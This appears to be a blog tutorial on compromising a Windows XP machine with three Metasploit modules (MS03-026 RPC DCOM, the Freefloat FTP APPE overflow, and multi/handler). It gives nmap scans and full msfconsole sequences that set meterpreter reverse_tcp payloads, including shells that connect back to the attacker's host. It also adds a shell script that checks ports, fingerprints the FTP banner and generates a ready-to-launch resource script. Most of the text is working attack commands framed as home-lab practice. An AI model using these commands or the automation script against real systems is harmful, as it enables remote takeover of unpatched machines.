
Top 3 Exploit Modules in Metasploit for Pawning your Windows XP at Home

In this article, I will discuss three Metasploit modules you can try when pentesting your Windows XP box at home. In this example, my IP address is 192.168.10.2 and the victim's IP is 192.168.10.4.

1.  Microsoft RPC DCOM Interface Overflow > exploit/windows/dcerpc/ms03_026_dcom

This module exploits a stack buffer overflow in the RPCSS service (MS03-026); the vulnerability is credited to the Last Stage of Delirium research group. RPCSS listens on TCP port 135, so before we can exploit the box we need to determine whether that port is open.

nmap 192.168.10.4


use exploit/windows/dcerpc/ms03_026_dcom
set payload windows/meterpreter/reverse_tcp
set rhost 192.168.10.4
set lhost 192.168.10.2
set lport 4444
exploit


2. Freefloat FTP Server APPE Command Overflow > exploit/windows/ftp/freefloat_ftp_apee_cmd

The Freefloat FTP Server APPE Command Overflow was a 0-day last year; this Metasploit module was written by SecPod.

In order to run the module we first need to download the Ruby script and put it in this directory: /opt/framework/msf3/modules/exploits/windows/ftp (BackTrack) or /opt/metasploit3/msf3/modules/exploits/windows/ftp (BackBox)

wget http://secpod.org/msf/freefloat_ftp_apee_cmd.rb

Before we can exploit the box, we need to determine whether port 21 is open and whether the service behind it really is Freefloat FTP Server; connecting with an FTP client and reading the greeting banner tells us that.

nmap 192.168.10.4

ftp 192.168.10.4


Alright, all is well, so we can launch Metasploit 😉

use exploit/windows/ftp/freefloat_ftp_apee_cmd
set payload windows/meterpreter/reverse_tcp
set rhost 192.168.10.4
set lhost 192.168.10.2
set lport 4444
exploit


Note: You can download Freefloat for free here.

3. Generic Payload Handler > exploit/multi/handler

If you are following this blog then you might be familiar with this module, which I used to pwn Windows 7 SP1, but it is also applicable to pentesting your Windows XP box. Note that multi/handler is not an exploit by itself: it only listens for the connection back from a payload you have already delivered to and executed on the target, so the listener must be running before the payload is launched.

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.10.2
set lport 4444
exploit

You can use another listening port in place of 4444, as long as the payload you generated was built with the same LHOST and LPORT.

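All three procedures above have the same shape: confirm the target port, confirm the service, then type the same handful of msfconsole lines. The script below is an added example and is not part of the original post or of Metasploit; it wraps those steps in a POSIX shell script that validates the addresses (catching a slip such as a missing dot in LHOST), optionally checks the port with nc and grabs the FTP greeting, and writes a Metasploit resource script that you can pass to msfconsole -r. The function names (valid_ipv4, build_rc, is_freefloat_banner and so on) are my own; nc and msfconsole are assumed to be installed; and the exact wording of the Freefloat greeting is an assumption, so the check only looks for "FreeFloat" in the 220 line and you should compare it against what your own banner grab returns.

```shell
#!/bin/sh
# Added example (not from the original post): pre-flight checks plus a
# Metasploit resource script for the ms03_026_dcom, Freefloat FTP and
# multi/handler runs described above. Assumes nc and msfconsole exist.

# True if $1 is a dotted-quad IPv4 address with every octet in 0..255.
# A slip such as "192.168.102" (three octets) fails here instead of
# silently giving Metasploit an LHOST that nothing can connect back to.
valid_ipv4() {
    printf '%s\n' "$1" | awk -F. '
        NF != 4 { exit 1 }
        { for (i = 1; i <= 4; i++) if ($i !~ /^[0-9]+$/ || $i > 255) exit 1 }
        { exit 0 }'
}

# True if TCP port $2 on host $1 accepts a connection (3 second timeout).
port_open() {
    nc -z -w 3 "$1" "$2" >/dev/null 2>&1
}

# Print the first line of the FTP greeting from host $1, then send QUIT
# so the server closes the session cleanly.
grab_ftp_banner() {
    printf 'QUIT\r\n' | nc -w 3 "$1" 21 2>/dev/null | head -n 1
}

# True if a greeting line looks like Freefloat: a 220 reply whose text
# contains "freefloat" (case-insensitive). The vendor's exact banner
# wording is an assumption; adjust this to what your banner grab shows.
is_freefloat_banner() {
    printf '%s\n' "$1" | grep -Eqi '^220.*freefloat'
}

# Emit an msfconsole resource script on stdout.
#   build_rc MODULE LHOST LPORT [RHOST]
# RHOST is left out for exploit/multi/handler, which only listens.
build_rc() {
    module=$1 lhost=$2 lport=$3 rhost=$4
    valid_ipv4 "$lhost" || { echo "build_rc: bad LHOST '$lhost'" >&2; return 1; }
    if [ -n "$rhost" ]; then
        valid_ipv4 "$rhost" || { echo "build_rc: bad RHOST '$rhost'" >&2; return 1; }
    fi
    echo "use $module"
    echo "set payload windows/meterpreter/reverse_tcp"
    if [ -n "$rhost" ]; then
        echo "set rhost $rhost"
    fi
    echo "set lhost $lhost"
    echo "set lport $lport"
    echo "exploit"
}

# Usage: sh msfprep.sh MODULE LHOST LPORT [RHOST]
#   sh msfprep.sh exploit/windows/dcerpc/ms03_026_dcom 192.168.10.2 4444 192.168.10.4
#   sh msfprep.sh exploit/windows/ftp/freefloat_ftp_apee_cmd 192.168.10.2 4444 192.168.10.4
#   sh msfprep.sh exploit/multi/handler 192.168.10.2 4444
if [ "$#" -ge 3 ]; then
    rc=$(build_rc "$@") || exit 1
    case $1 in
        exploit/windows/dcerpc/*) port=135 ;;
        exploit/windows/ftp/*)    port=21 ;;
        *)                        port= ;;
    esac
    if [ -n "$port" ]; then
        [ -n "$4" ] || { echo "RHOST is required for $1" >&2; exit 1; }
        port_open "$4" "$port" || { echo "tcp/$port is closed on $4" >&2; exit 1; }
    fi
    if [ "$port" = 21 ]; then
        banner=$(grab_ftp_banner "$4")
        is_freefloat_banner "$banner" || { echo "not Freefloat FTP: '$banner'" >&2; exit 1; }
    fi
    printf '%s\n' "$rc" > target.rc
    echo "wrote target.rc; launch with: msfconsole -r target.rc"
fi
```

Only the generated resource script reaches msfconsole; the port and banner checks run first so that a wrong address or a non-Freefloat FTP daemon is reported before any exploit is fired.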
